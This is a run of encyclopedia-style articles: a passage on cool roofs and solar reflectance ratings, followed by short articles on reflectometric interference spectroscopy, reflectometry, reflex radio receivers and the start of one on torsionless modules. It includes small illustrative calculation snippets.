roughness. Another alternative is to coat the granules using a dual coat process: the outer coating would have the desired color pigment, though it may not be very reflective, while the inner coating is a highly reflective titanium dioxide coating.
Natural white gravel covering can be seen as an alternative option to obtain cool roofing and cool pavements. [ 25 ]
The roofs with the highest SRI ratings, and thus the coolest roofs, are stainless steel roofs, which are just several degrees above ambient under medium wind conditions. Their SRIs range from 100 to 115. Some are also hydrophobic, so they stay very clean and maintain their original SRI even in polluted environments. [A]
An existing (or new) roof can be made reflective by applying a solar reflective coating to its surface. The reflectivity and emissivity ratings for over 500 reflective coatings can be found in the Cool Roof Rating Council's rated products directory. [ 26 ]
Researchers at the Lawrence Berkeley National Laboratory have determined that a pigment used by the ancient Egyptians known as " Egyptian blue " absorbs visible light, and emits light in the near-infrared range. It may be useful in construction materials to keep roofs and walls cool. [ 27 ] [ 28 ] [ 29 ]
They have also developed fluorescent ruby red coatings which have reflective properties similar to white roofs. [ 30 ] [ 31 ]
Green roofs provide a thermal mass layer which helps reduce the flow of heat into a building. The solar reflectance of green roofs varies depending on the plant types (generally 0.3–0.5). [ 32 ] Green roofs may not reflect as much as a cool roof but do have other benefits such as evapotranspiration , which cools the plants and the immediate area around them, helping to lower rooftop temperatures while naturally increasing humidity. Moreover, some green roofs need maintenance such as regular watering.
A 2011 study by researchers at Stanford University suggested that although reflective roofs decrease temperatures in buildings and mitigate the " urban heat island effect", they may actually increase global temperature. [ 33 ] [ 34 ] The study noted that it did not account for the reduction in greenhouse gas emissions that results from building energy conservation (annual cooling energy savings less annual heating energy penalty) associated with cool roofs (meaning that one will need to use more energy to heat the living space due to reduction in heat from sunlight in winter.) However, this applies only to those areas with low winter temperatures – not tropical climates. Also, homes in areas receiving snow in winter months are unlikely to receive significantly more heat from darker roofs, as they will be snow-covered most of the winter. A response paper titled "Cool Roofs and Global Cooling," by researchers in the Heat Island Group at Lawrence Berkeley National Laboratory, raised additional concerns about the validity of these findings, citing the uncertainty acknowledged by the authors, statistically insignificant numerical results, and insufficient granularity in analysis of local contributions to global feedbacks. [ 35 ]
Also, 2012 research at University of California, San Diego 's Jacobs School of Engineering into the interaction between reflective pavements and buildings found that, unless the nearby buildings are fitted with reflective glass or other mitigation factors, solar radiation reflected off light-colored pavements can increase the temperature in nearby buildings, increasing air conditioning demands and energy usage. [ 36 ]
In 2014, a team of researchers, led by Matei Georgescu, an assistant professor in Arizona State University 's School of Geographical Sciences and Urban Planning and a senior sustainability scientist in the Global Institute of Sustainability , explored the relative effectiveness of some of the most common adaptation technologies aimed at reducing warming from urban expansion. Results of the study indicate that the performance of urban adaptation technologies can counteract this increase in temperature, but also varies seasonally and is geographically dependent. [ 37 ]
Specifically, what works in California's Central Valley, such as cool roofs, does not necessarily provide the same benefits to other regions of the country, like Florida. Assessing consequences that extend beyond near surface temperatures, such as rainfall and energy demand, reveals important trade-offs that are often unaccounted for. Cool roofs have been found to be particularly effective for certain areas during summertime. However, during winter, these same urban adaptation strategies, when deployed in northerly locations, further cool the environment, and consequently require additional heating to maintain comfort levels. “The energy savings gained during the summer season, for some regions, is nearly entirely lost during the winter season,” Georgescu said. In Florida, and to a lesser extent southwestern states, there is a very different effect caused by cool roofs. “In Florida, our simulations indicate a significant reduction in precipitation," he said. "The deployment of cool roofs results in a 2 to 4 millimeter per day reduction in rainfall, a considerable amount (nearly 50 percent) that will have implications for water availability, reduced stream flow and negative consequences for ecosystems. For Florida, cool roofs may not be the optimal way to battle the urban heat island because of these unintended consequences.” Overall, the researchers suggest that judicious planning and design choices should be considered in trying to counteract rising temperatures caused by urban sprawl and greenhouse gases. They add that “urban-induced climate change depends on specific geographic factors that must be assessed when choosing optimal approaches, as opposed to one-size-fits-all solutions.” [ 38 ]
A series of Advanced Energy Design Guides were developed in cooperation with ASHRAE (American Society of Heating, Refrigerating and Air-Conditioning Engineers), AIA (The American Institute of Architects ), IESNA (Illuminating Engineering Society of North America), USGBC (United States Green Building Council) and US DOE (United States Department of Energy) in 2011. These guides were aimed at achieving 50% Energy Savings toward a Net zero-energy building and covered the building types of Small to Medium Office Buildings, Medium to Big Box Retail Buildings, Large Hospitals and K-12 School Buildings. In Climate Zones 4 and above the recommendation is to follow the ASHRAE 90.1 standard for roof reflectance, which does not require roofs to be reflective in these zones. In Climate Zones 4 and above, Cool Roofs are not a recommended Design Strategy. [ 39 ]
A series of Advanced Energy Retrofit Guides for “Practical Ways to Improve Energy Performance” were developed in cooperation with the US DOE (United States Department of Energy) and PNNL (Pacific Northwest National Laboratory) in 2011. These guides were aimed at improvements to existing Retail and Office buildings which could improve their energy efficiency. Cool roofs were not recommended for all locations. “This measure is likely more cost-effective in the hot and humid climate zone, which has a long cooling season, than in the very cold climate zone, for example. For buildings located in warm climates, this measure is worth consideration.” [ 40 ] [ 41 ]
The Copper Development Association has conducted several studies, beginning in 2002, which examined the elevated temperatures of wiring inside conduits at and above various color roof materials. The findings concluded that the temperatures above cool roofs were higher than those of a darker colored roof material. This illustrates the idea in which deflected solar radiation, when impeded by rooftop equipment, piping, or other materials will be subjected to the heat gain of the radiation. [ 42 ]
According to the US DOE ’s "Guidelines for Selecting Cool Roofs":
“Cool roofs must be considered in the context of your surroundings. It is relatively easy to specify a cool roof and predict energy savings, but some thinking ahead can prevent other headaches. Ask this question before installing a cool roof: Where will the reflected sunlight go?
A bright, reflective roof could reflect light and heat into the higher windows of taller neighboring buildings. In sunny conditions, this could cause uncomfortable glare and unwanted heat for you or your neighbors. Excess heat caused by reflections increases air conditioning energy use, negating some of the energy saving benefits of the cool roof.” [ 43 ]
According to the US DOE 's "Guidelines for Selecting Cool Roofs" on the subject of cool roof maintenance:
"As a cool roof becomes dirty from pollution, foot traffic, wind-deposited debris, ponded water, and mold or algae growth, its reflectance will decrease, leading to higher temperatures. Especially dirty roofs may perform substantially worse than product labels indicate. Dirt from foot traffic may be minimized by specifying designated walkways or by limiting access to the roof. Steep sloped roofs have less of a problem with dirt accumulation because rainwater can more easily wash away dirt and debris. Some cool roof surfaces are “self-cleaning” which means they shed dirt more easily and may better retain their reflectance. Cleaning a cool roof can restore solar reflectance close to its installed condition. Always check with your roof manufacturer for the proper cleaning procedure, as some methods may damage your roof. While it is generally not cost effective to clean a roof just for the energy savings, roof cleaning can be integrated as one component of your roof's routine maintenance program. It is therefore best to estimate energy savings based on weathered solar reflectance values rather than clean roof values." [ 43 ]
When the sunlight strikes a dark rooftop, about 15% of it gets reflected back into the sky but most of its energy is absorbed into the roof system in the form of heat. Cool roofs reflect significantly more sunlight and absorb less heat than traditional dark-colored roofs. [ 9 ]
There are two properties that are used to measure the effects of cool roofs: solar reflectance (the fraction of incident sunlight that the surface reflects) and thermal emittance (the ability of the surface to radiate away absorbed heat).
Another method of evaluating coolness is the solar reflectance index (SRI), which incorporates both solar reflectance and emittance in a single value. SRI measures the roof's ability to reject solar heat, defined such that a standard black (reflectance 0.05, emittance 0.90) is 0 and a standard white (reflectance 0.80, emittance 0.90) is 100. [ 44 ]
A perfect SRI is approximately 122, the value for a perfect mirror, which absorbs no sunlight and has very low emissivity. The only practical material which approaches this level is stainless steel with an SRI of 112. High-reflectivity, low-emissivity roofs maintain a temperature very close to ambient at all times preventing heat gains in hot climates and minimizing heat loss in cold climates. High emissivity roofs have much higher heat loss in cold climates for the same insulation values.
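The SRI computation itself can be sketched as a small steady-state energy balance in the spirit of ASTM E1980: solve for the equilibrium surface temperature of the candidate surface and of the standard black and white surfaces, then interpolate. The constants below approximate the standard's "medium wind" conditions, but this is a simplified illustration rather than the standard's exact procedure.

```python
# Simplified SRI estimate via a steady-state surface energy balance.
# Illustrative only: constants approximate ASTM E1980 "medium wind" conditions,
# but this is not the standard's exact calculation procedure.

SIGMA = 5.670e-8        # Stefan-Boltzmann constant, W/m^2K^4
I_SOLAR = 1000.0        # solar irradiance, W/m^2
T_AIR = 310.0           # air temperature, K
T_SKY = 300.0           # effective sky temperature, K
H_CONV = 12.0           # convective coefficient (medium wind), W/m^2K

def surface_temperature(reflectance: float, emittance: float) -> float:
    """Solve absorbed solar = radiative + convective losses by bisection."""
    absorptance = 1.0 - reflectance
    def residual(t):
        return (absorptance * I_SOLAR
                - emittance * SIGMA * (t**4 - T_SKY**4)
                - H_CONV * (t - T_AIR))
    lo, hi = 250.0, 450.0
    for _ in range(80):
        mid = 0.5 * (lo + hi)
        if residual(mid) > 0:
            lo = mid
        else:
            hi = mid
    return 0.5 * (lo + hi)

def sri(reflectance: float, emittance: float) -> float:
    t_black = surface_temperature(0.05, 0.90)   # standard black, SRI = 0
    t_white = surface_temperature(0.80, 0.90)   # standard white, SRI = 100
    t_surf = surface_temperature(reflectance, emittance)
    return 100.0 * (t_black - t_surf) / (t_black - t_white)

print(f"white membrane-like surface (0.80, 0.90): SRI ~ {sri(0.80, 0.90):.0f}")
print(f"dark asphalt-like surface (0.10, 0.90):   SRI ~ {sri(0.10, 0.90):.0f}")
```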
The Roof Savings Calculator (RSC) is a tool developed by the U.S. Department of Energy's Oak Ridge National Laboratory which estimates cooling and heating savings for low-slope roof applications with white and black surfaces. [ 45 ]
This tool was the collaboration of both Oak Ridge National Laboratory and Lawrence Berkeley National Laboratory in order to provide industry-consensus roof savings for both residential and commercial buildings. It reports the net annual energy savings (cooling energy savings minus heating penalties) and thus is only applicable to the buildings with a heating and/or cooling system. [ 46 ]
Solar reflective cars or cool cars reflect more sunlight than dark cars, reducing the amount of heat that is transmitted into the car's interior. Therefore, it helps decrease the need for air conditioning, fuel consumption, and emissions of greenhouse gases and urban air pollutants. [ 47 ]
Cool color parking lots are parking lots made with a reflective layer of paint. [ 48 ] Cool pavements which are designed to reflect solar radiation may use modified mixes, reflective coatings, permeable pavements, and vegetated pavements. [ 49 ]
Mirrors are being explored as a reflective surface to reflect solar radiation and cool temperatures. MEER is a nonprofit proposing the use of recycled materials to manufacture mirrors and polymer reflective films for potential widespread use on rooftops and in open spaces such as farmland. Trials have been undertaken in California and further application opportunities are developing in New Hampshire , India , and Africa . [ 50 ]
Some papers have proposed the deployment of specific thermal emitters (whether via advanced paint, or printed rolls of material) which would simultaneously reflect sunlight and also emit energy at longwave infrared (LWIR) wavelengths of 8–20 μm, which fall largely within the atmospheric window and therefore escape into outer space rather than being trapped by the greenhouse effect. It has been suggested that to stabilize Earth's energy budget and thus cease warming, 1–2% of the Earth's surface (area equivalent to over half of Sahara ) would need to be covered with these emitters, at the deployment cost of $1.25–2.5 trillion. While low next to the estimated $20 trillion saved by limiting the warming to 1.5 °C (2.7 °F) rather than 2 °C (3.6 °F), it does not include any maintenance costs. [ 51 ] [ 52 ]
In some climates where there are more heating days than cooling days, white reflective roofs may not be effective in terms of energy efficiency or savings because the savings on cooling energy use can be outweighed by heating penalties during winter. According to the U.S. Energy Information Administration, 2003 Commercial Buildings Energy Consumption Survey, heating accounts for 36% of commercial buildings' annual energy consumption, while air conditioning only accounts for 8% in United States. [ 53 ] Energy calculators generally show a yearly net savings for dark-colored roof systems in cool climates.
A perfect roof would absorb no heat in the summer and lose no heat in the winter. To do this it would need a very high SRI to eliminate all radiative heat gains in summer and losses in winter. High SRI roofs act as a radiant barrier , providing a thermos-bottle effect. High emissivity cool roofs carry a climate penalty due to winter radiative heat losses, which reflective bare metal roofs, such as stainless steel, do not.
In a 2001 federal study, the Lawrence Berkeley National Laboratory (LBNL) measured and calculated the reduction in peak energy demand associated with a cool roof's surface reflectance. [ 54 ] LBNL found that, compared to the original black rubber roofing membrane on the Texas retail building studied, a retrofitted vinyl membrane delivered an average decrease of 24 °C (43 °F) in surface temperature, an 11% decrease in aggregate air conditioning energy consumption, and a corresponding 14% drop in peak hour demand. The average daily summertime temperature of the black roof surface was 75 °C (167 °F), but once retrofitted with a white reflective surface, it measured 52 °C (126 °F). Without considering any tax benefits or other utility charges, annual energy expenditures were reduced by $7,200 or $0.07/square foot.(This figure is for energy charges as well as peak demand charges).
Instruments measured weather conditions on the roof, temperatures inside the building and throughout the roof layers, and air conditioning and total building power consumption. Measurements were taken with the original black rubber roofing membrane and then after replacement with a white vinyl roof with the same insulation and HVAC systems in place.
Though a full year of actual data was collected, due to aberrations in the data, one month of data was excluded along with several other days which didn't meet the parameters of the study. Only 36 continuous pre-retrofit days were used and only 28 non-continuous operating days were used for the post-retrofit period. [ 54 ]
Another case study, conducted in 2009 and published in 2011, was completed by Ashley-McGraw Architects and CDH Energy Corp for Onondaga County Dept. of Corrections, in Jamesville, New York, evaluated energy performance of a green or vegetative roof, a dark EPDM roof and a white reflective TPO roof. The measured results showed that the TPO and vegetative roof systems had much lower roof temperatures than the conventional EPDM surface. The reduction in solar absorption reduced solar gains in the summer but also increased heat losses during the heating season. Compared to the EPDM membrane, the TPO roof had 30% higher heating losses and the vegetative roof had 23% higher losses. [ 55 ]
In July 2010, the United States Department of Energy announced a series of initiatives to more broadly implement cool roof technologies on DOE facilities and buildings across the country. [ 56 ] As part of the new efforts, DOE will install a cool roof, whenever cost-effective over the lifetime of the roof, during construction of a new roof or the replacement of an old one at a DOE facility.
In October 2013, the United States Department of Energy ranked Cool Roofs as a 53 out of 100 (0 to 100 weighted average) for a cost-effective energy strategy. [ 57 ] "Climate issues can affect cool roof performance. Cool roofs are more beneficial in warmer climates and may cause energy consumption for heating applications to rise in colder climates. Cool roofs have a lower impact the more insulation is used. The Secretary of Energy directed all U.S. Department of Energy (DOE) offices to install cool roofs, when life-cycle cost-effectiveness is demonstrated, when constructing new roofs, or when replacing old roofs at DOE facilities. Other Federal agencies were also encouraged to do the same." [ 57 ]
Energy Star is a joint program of the U.S. Environmental Protection Agency and the U.S. Department of Energy designed to reduce greenhouse gas emissions and help businesses and consumers save money by making energy-efficient product choices.
For low-slope roof applications, a roof product qualifying for the Energy Star label under its Roof Products Program must have an initial solar reflectivity of at least 0.65, and weathered reflectance of at least 0.50, in accordance with EPA testing procedures. [ 58 ] Warranties for reflective roof products must be equal in all material respects to warranties offered for comparable non-reflective roof products, either by a given company or relative to industry standards.
Unlike other Energy Star-rated products, such as appliances, this rating system does not look at the entire roof assembly, but only the exterior surface. Consumers (i.e. building owners) may believe that the Energy Star label means their roof is energy-efficient; however, the testing is not as stringent as their appliance standard and does not include the additional components of a roof (i.e. roof structure, fire rated barriers, insulation, adhesives, fasteners, etc.). [ 59 ] A disclaimer is posted on their website "Although there are inherent benefits in the use of reflective roofing, before selecting a roofing product based on expected energy savings consumers should explore the expected calculated results that can be found on the Department of Energy's "Roof Savings Calculator" website at www.roofcalc.com. Please remember the Energy Savings that can be achieved with reflective roofing is highly dependent on facility design, insulation used, climatic conditions, building location, and building envelope efficiency." [ 59 ]
Cool Roof Rating Council [ 60 ] (CRRC) has created a rating system for measuring and reporting the solar reflectance and thermal emittance of roofing products. This system has been put into an online directory of more than 850 roofing products and is available for energy service providers, building code bodies, architects and specifiers, property owners and community planners. CRRC conducts random testing each year to ensure the credibility of its rating directory.
CRRC's rating program allows manufacturers and sellers to appropriately label their roofing products according to specific CRRC measured properties. The program does not, however, specify minimum requirements for solar reflectance or thermal emittance.
The Green Globe system is used in Canada and the United States. In the U.S., Green Globes is owned and operated by the Green Building Initiative (GBI). In Canada, the version for existing buildings is owned and operated by BOMA Canada under the brand name 'Go Green' (Visez vert).
Green Globe uses performance benchmark criteria to evaluate a building's likely energy consumption, comparing the building design against data generated by the EPA's Target Finder, which reflects real building performance. Buildings may earn a rating of between one and four globes. This is an online system; a building's information is verified by a Green Globes-approved and trained licensed engineer or architect. To qualify for a rating, roofing materials must have a solar reflectance of at least 0.65 and thermal emittance of at least 0.90. As many as 10 points may be awarded for 1–100 percent roof coverage with either vegetation or highly reflective materials or both. The basis in physics of a high emittance is quite questionable, since it merely describes a material which easily radiates infrared wavelength heat to the environment, contributing to the greenhouse effect. Highly reflective, low-emittance materials are much better at reducing energy consumption.
The U.S. Green Building Council's Leadership in Energy and Environmental Design (LEED) rating system is a voluntary, continuously evolving national standard for developing high performance sustainable buildings. [ citation needed ] LEED provides standards for choosing products in designing buildings, but does not certify products. [ citation needed ]
Unlike a building code , such as the International Building Code , only members of the USGBC and specific "in-house" committees may add, subtract or edit the standard, based on an internal review process. Model Building Codes are voted on by members and "in-house" committees, but allow for comments and testimony from the general public during each and every code development cycle at Public Review hearings, generally held multiple times a year. [ 61 ]
Under the LEED 2009 version, to receive Sustainable Sites Credit 7.2 Heat Island Effect-Roof, at least 75% of the surface of a roof must use materials having a solar reflective index (SRI) of at least 78. This criterion can also be met by installing a vegetated roof for at least 50% of the roof area, or installing a high albedo and vegetated roof in combination that meets this formula: (Area of Roof meeting Minimum SRI Roof/0.75) + (Area of vegetated roof/0.5) ≥ Total Roof Area. [ 62 ]
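That combined-roof criterion is easy to check mechanically; the sketch below encodes the formula as given, with purely hypothetical area figures in the example.

```python
def meets_leed_ss72(total_roof_area: float,
                    high_sri_area: float,
                    vegetated_area: float) -> bool:
    """LEED 2009 SS Credit 7.2 combined option:
    (area meeting minimum SRI / 0.75) + (vegetated area / 0.5) >= total roof area."""
    return (high_sri_area / 0.75) + (vegetated_area / 0.5) >= total_roof_area

# Hypothetical 10,000 m^2 roof: 4,500 m^2 of SRI-78 membrane plus 2,000 m^2 of
# vegetated roof -> 6,000 + 4,000 = 10,000 >= 10,000, so the credit is met.
print(meets_leed_ss72(10_000, 4_500, 2_000))   # True
```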
Examples of LEED-certified buildings with white reflective roofs are below. [ 63 ]
This project is co-financed by the European Union in the framework of the Intelligent Energy Europe Programme.
The aim of the proposed action is to create and implement an Action Plan for cool roofs in the EU. The specific objectives are: to support policy development by transferring experience and improving understanding of the actual and potential contributions of cool roofs to heating and cooling consumption in the EU; to remove and simplify the procedures for the integration of cool roofs in construction and the building stock; to change the behaviour of decision-makers and stakeholders so as to improve the acceptability of cool roofs; and to disseminate and promote the development of innovative legislation, codes, permits and standards, including application procedures, construction and planning permits concerning cool roofs. [ 66 ] The work will be developed along four axes: technical, market, policy and end-users.
In tropical Australia, zinc-galvanized (silvery) sheeting (usually corrugated ) does not reflect heat as well as the truly "cool" color of white, especially as metallic surfaces fail to emit infrared back to the sky. [ 67 ] European trends now favour darker-colored aluminium roofing in pursuit of consumer fashion.
NYC °CoolRoofs is a New York City initiative to coat rooftops white with volunteers. [ 68 ] The program began in 2009 as part of PlaNYC , [ 69 ] and has coated over 5 million square feet of NYC rooftops white. [ 70 ] On Wednesday, September 25, 2013 Mayor Michael R Bloomberg declared it "NYC °CoolRoofs Day" in New York City with the coating of its 500th building and reducing the carbon footprint by over 2000 tons. Volunteers use paintbrushes and rollers to apply an acrylic, elastomeric coating to the roof membrane. [ 71 ] A 2011 Columbia University study of roofs coated through the program found that white roofs showed an average temperature reduction of 43 degrees Fahrenheit when compared to black roofs. [ 72 ]
White Roof Project is a US nationwide initiative [ 73 ] that educates and empowers individuals [ 74 ] to coat rooftops white. The program's outreach [ 75 ] has helped complete white roof projects in more than 20 US states and five countries, engaged thousands in volunteer projects, and sponsored the coating of hundreds of nonprofit and low-income rooftops .
An urban heat island occurs where the combination of heat-absorbing infrastructure such as dark asphalt parking lots and road pavement and expanses of black rooftops, coupled with sparse vegetation, raises air temperature by 1 to 3 °C (1.8 to 5.4 °F) higher than the temperature in the surrounding countryside. [ 76 ] [ 77 ]
Green building programs advocate the use of cool roofing to mitigate the urban heat island effect and the resulting poorer air quality (in the form of smog) the effect causes. By reflecting sunlight, light-colored roofs minimize the temperature rise and reduce cooling energy use and smog formation. A study by LBNL showed that, if strategies to mitigate this effect, including cool roofs, were widely adopted, the Greater Toronto metropolitan area could save more than $11 million annually on energy costs. [ 78 ] | https://en.wikipedia.org/wiki/Reflective_surfaces_(climate_engineering) |
Reflectometric interference spectroscopy (RIfS) is a physical method based on the interference of white light at thin films, which is used to investigate molecular interaction.
The underlying measuring principle corresponds to that of the Michelson interferometer .
White light is directed vertically onto a multiple-layer system consisting of a SiO 2 layer, a high-refractive-index Ta 2 O 5 layer and an additional SiO 2 layer (this additional layer can be chemically modified). The partial beams of the white light are reflected at each phase boundary and otherwise refracted (transmitted). These reflected partial beams superimpose, which results in an interference spectrum that is detected using a diode array spectrometer. Through chemical modification, the upper SiO 2 layer is altered so that it can interact with target molecules. This interaction causes a change in the physical thickness d of the layer and in the refractive index n within this layer. The product of the two defines the optical thickness of the layer: n • d. A change in the optical thickness results in a modulation of the interference spectrum. Monitoring this change over time makes it possible to observe the binding behaviour of the target molecules.
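The interference modulation described above can be illustrated with a simple two-interface thin-film model. The sketch below assumes normal incidence, non-absorbing layers and illustrative refractive indices and layer thickness (it does not model the full SiO2/Ta2O5/SiO2 stack or dispersion); it shows how a small change in the optical thickness n • d shifts the reflectance spectrum.

```python
import numpy as np

def reflectance(wavelength_nm, n_ambient, n_film, n_substrate, thickness_nm):
    """Normal-incidence reflectance of a single non-absorbing thin film
    (Airy formula for a two-interface system)."""
    r1 = (n_ambient - n_film) / (n_ambient + n_film)
    r2 = (n_film - n_substrate) / (n_film + n_substrate)
    delta = 4.0 * np.pi * n_film * thickness_nm / wavelength_nm   # round-trip phase
    r = (r1 + r2 * np.exp(-1j * delta)) / (1.0 + r1 * r2 * np.exp(-1j * delta))
    return np.abs(r) ** 2

wavelengths = np.linspace(400.0, 800.0, 5)   # a few visible wavelengths, in nm
# Illustrative values only: aqueous ambient, SiO2-like sensing layer on a
# higher-index layer beneath it.
before = reflectance(wavelengths, 1.33, 1.46, 2.10, 330.0)
after = reflectance(wavelengths, 1.33, 1.46, 2.10, 335.0)  # ~5 nm of bound molecules

for wl, r_before, r_after in zip(wavelengths, before, after):
    print(f"{wl:5.0f} nm: R before = {r_before:.4f}, after binding = {r_after:.4f}")
# Tracking the resulting shift of the spectrum's extrema over time yields the
# binding curve of the target molecules.
```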
RIfS is used especially as a detection method in chemo- and biosensors .
Chemosensors are particularly suitable for measurements under difficult conditions and in the gaseous phase. The sensitive layers are mostly non-selective polymers which sort the analytes according to size (the so-called molecular sieve effect when using microporous polymers) or according to polarity (e.g. functionalized polydimethylsiloxanes ). When performing non-selective measurements, a sum signal from several analytes is measured, which means that multivariate data analyses such as neural networks have to be used for quantification. However, it is also possible to use selectively measuring polymers, so-called molecularly imprinted polymers (MIPs), which provide artificial recognition elements.
When using biosensors , polymers such as polyethylene glycols or dextrans are applied onto the layer system, and recognition elements for biomolecules are immobilized on them. Basically, any molecule can be used as a recognition element (proteins such as antibodies , DNA/RNA such as aptamers , small organic molecules such as estrone , but also lipids such as phospholipid membranes).
RIfS, like surface plasmon resonance (SPR), is a label-free technique, which allows the time-resolved observation of interactions between the binding partners without the use of fluorescent or radioactive labels. | https://en.wikipedia.org/wiki/Reflectometric_interference_spectroscopy
Reflectometry is a general term for the use of the reflection of waves or pulses at surfaces and interfaces to detect or characterize objects, sometimes to detect anomalies as in fault detection and medical diagnosis . [ 1 ]
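For example, in time-domain reflectometry, a common electrical form of the technique used for locating faults in cables, the distance to a reflecting discontinuity follows from the round-trip delay of a launched pulse. A minimal sketch, with an assumed velocity factor:

```python
def fault_distance(round_trip_delay_s: float, velocity_factor: float = 0.66,
                   c: float = 299_792_458.0) -> float:
    """Distance to a reflecting discontinuity from the round-trip pulse delay.
    The pulse travels to the fault and back, hence the division by 2."""
    return velocity_factor * c * round_trip_delay_s / 2.0

# A reflection arriving 1.0 microsecond after launch on a typical coaxial cable
# (velocity factor ~0.66, an assumed value) places the fault at roughly 99 m.
print(f"{fault_distance(1.0e-6):.1f} m")
```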
There are many different forms of reflectometry. They can be classified in several ways: by the used radiation (electromagnetic, ultrasound, particle beams), by the geometry of wave propagation (unguided versus wave guides or cables), by the involved length scales (wavelength and penetration depth in relation to size of the investigated object), by the method of measurement (continuous versus pulsed, polarization resolved, ...), and by the application domain.
Many techniques are based on the principle of reflectometry and are distinguished by the type of waves used and the analysis of the reflected signal. The main techniques include, but are not limited to: | https://en.wikipedia.org/wiki/Reflectometry
A reflex radio receiver , occasionally called a reflectional receiver , is a radio receiver design in which the same amplifier is used to amplify the high-frequency radio signal (RF) and the low-frequency audio (sound) signal (AF). [ 2 ] [ 3 ] [ 4 ] It was invented in 1914 by German scientists Wilhelm Schloemilch and Otto von Bronk, [ 1 ] and rediscovered and extended to multiple tubes in 1917 by Marius Latour [ 5 ] [ 3 ] [ 6 ] and William H. Priess. [ 3 ] The radio signal from the antenna and tuned circuit passes through an amplifier, is demodulated in a detector which extracts the audio signal from the radio carrier , and the resulting audio signal passes again through the same amplifier for audio amplification before being applied to the earphone or loudspeaker. The reason for using the amplifier for "double duty" was to reduce the number of active devices, vacuum tubes or transistors , required in the circuit, and thus the cost. The economical reflex circuit was used in inexpensive vacuum tube radios in the 1920s, and was revived again in simple portable tube radios in the 1930s. [ 7 ]
The block diagram shows the general form of a simple reflex receiver. The receiver functions as a tuned radio frequency (TRF) receiver. The radio frequency (RF) signal from the tuned circuit ( bandpass filter ) is amplified, then passes through the high pass filter to the demodulator , which extracts the audio frequency (AF) ( modulation ) signal from the carrier wave . The audio signal is added back into the input of the amplifier, and is amplified again. At the output of the amplifier the audio is separated from the RF signal by the low pass filter and is applied to the earphone. The amplifier could be a single stage or multiple stages. It can be seen that since each active device (tube or transistor) is used to amplify the signal twice, the reflex circuit is equivalent to an ordinary receiver with double the number of active devices.
The reflex receiver should not be confused with a regenerative receiver , in which the same signal is fed back from the output of the amplifier to its input. In the reflex circuit it is only the audio extracted by the demodulator which is added to the amplifier input, so there are two separate signals at different frequencies passing through the amplifier at the same time.
The reason the two signals, the RF and AF currents, can pass simultaneously through the amplifier without interfering is the superposition principle , which applies because the amplifier is linear . Since the two signals have different frequencies, they can be separated at the output with frequency-selective filters. Therefore the proper functioning of the circuit depends on the amplifier operating in the linear region of its transfer curve . If the amplifier is significantly nonlinear, intermodulation distortion will occur and the audio signal will modulate the RF signal, resulting in audio feedback which can cause shrieking in the earphone. The presence of the audio return circuit from the amplifier output to input made the reflex circuit vulnerable to such parasitic oscillation problems.
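The superposition argument can be checked numerically: two signals at widely separated frequencies pass through one linear gain stage and are recovered with frequency-selective filters. This is a minimal sketch of the principle only; the carrier frequency, audio tone, gain, and filter cutoffs are arbitrary illustrative values, not parameters of any historical receiver.

```python
import numpy as np
from scipy.signal import butter, filtfilt

fs = 200_000                         # sample rate, Hz
t = np.arange(0, 0.02, 1 / fs)       # 20 ms of signal

rf = np.cos(2 * np.pi * 50_000 * t)  # "RF" carrier at 50 kHz
af = np.sin(2 * np.pi * 1_000 * t)   # "AF" audio tone at 1 kHz

amplified = 10.0 * (rf + af)         # one linear amplifier acting on the sum

# Frequency-selective filters separate the two signals at the output.
b_hi, a_hi = butter(4, 20_000, btype="high", fs=fs)
b_lo, a_lo = butter(4, 5_000, btype="low", fs=fs)
rf_out = filtfilt(b_hi, a_hi, amplified)   # would go to the demodulator
af_out = filtfilt(b_lo, a_lo, amplified)   # would go to the earphone

# Because the stage is linear, each recovered signal is a scaled copy of
# its input; a nonlinear stage would instead generate intermodulation
# products that mix the two frequencies.
```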
The most common application of the reflex circuit in the 1920s was in inexpensive single tube receivers, because many consumers could not afford more than one vacuum tube, and the reflex circuit got the most out of a single tube; it was equivalent to a two-tube set. During this period the demodulator was usually a carborundum point contact diode , but sometimes a vacuum tube grid-leak detector . However, multitube receivers like the TRF and superheterodyne were also made with some of their amplifier stages "reflexed".
Low cost mains-powered radios that used a reflex TRF design, with only three tubes, were still being mass produced in the late 1940s. [ 8 ] [ 9 ]
The reflex principle was used in compact superheterodyne radio receivers from the 1930s [ 10 ] and continued into the 1950s, [ 11 ] until at least 1959; [ 12 ] the intermediate frequency amplifier stage also served as the first audio frequency stage in a reflex arrangement. That arrangement gave a four-tube radio performance similar to that of a five-tube set. Often, but not always, such reflex receivers did not have automatic gain control (AGC) , and it was usually not possible to reduce the volume completely to zero, even at the minimum volume setting. [ 9 ] At least one type of tube was specially designed for this kind of receiver. [ 13 ]
The diagram (right) shows one of the most common single tube reflex circuits from the early 1920s. It functioned as a TRF receiver with one stage of RF and one stage of audio amplification. The radio frequency (RF) signal from the antenna passes through the bandpass filter C 1 , L 1 , L 2 , C 2 and is applied to the grid of the directly heated triode , V 1 . The capacitor C 6 bypasses the RF signal around the audio transformer winding T 2 which would block it. The amplified signal from the plate of the tube is applied to the RF transformer L 3 , L 4 while C 3 bypasses the RF signal around the headphone coils. The tuned secondary L 4 , C 5 which is tuned to the input frequency, serves as a second bandpass filter as well as blocking the audio signal in the plate circuit from getting to the detector. Its output is rectified by semiconductor diode D , which was a carborundum point contact type.
The resulting audio signal extracted by the diode from the RF signal is coupled back into the grid circuit by audio transformer T 1 , T 2 whose iron core serves as a choke to help prevent RF from getting back into the grid circuit and causing feedback. The capacitor C 4 provides more protection against feedback, blocking the pulses of RF from the diode, but is usually not needed since the transformer's winding T 1 normally has enough parasitic capacitance. The audio signal is applied to the grid of the tube and amplified. The amplified audio signal from the plate passes easily through the low inductance RF primary winding L 3 and is applied to the earphones T . The rheostat R 1 controlled the filament current, and in these early sets was used as a volume control. | https://en.wikipedia.org/wiki/Reflex_receiver |
In abstract algebra , a module M over a ring R is called torsionless if it can be embedded into some direct product R I . Equivalently, M is torsionless if each non-zero element of M has non-zero image under some R -linear functional f : M → R ; that is, for every non-zero m ∈ M there exists f ∈ Hom R ( M , R ) with f ( m ) ≠ 0.
This notion was introduced by Hyman Bass . [ citation needed ]
A module is torsionless if and only if the canonical map into its double dual, M → M ∗∗ = Hom R ( Hom R ( M , R ) , R ) , which sends m ∈ M to the evaluation map f ↦ f ( m ),
is injective . If this map is bijective then the module is called reflexive . For this reason, torsionless modules are also known as semi-reflexive .
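A standard worked example (added here for illustration; it is not drawn from the cited sources) separates torsion-free from torsionless: the rationals, viewed as a module over the integers, are torsion-free but not torsionless, since they admit no non-zero functional into the integers.

```latex
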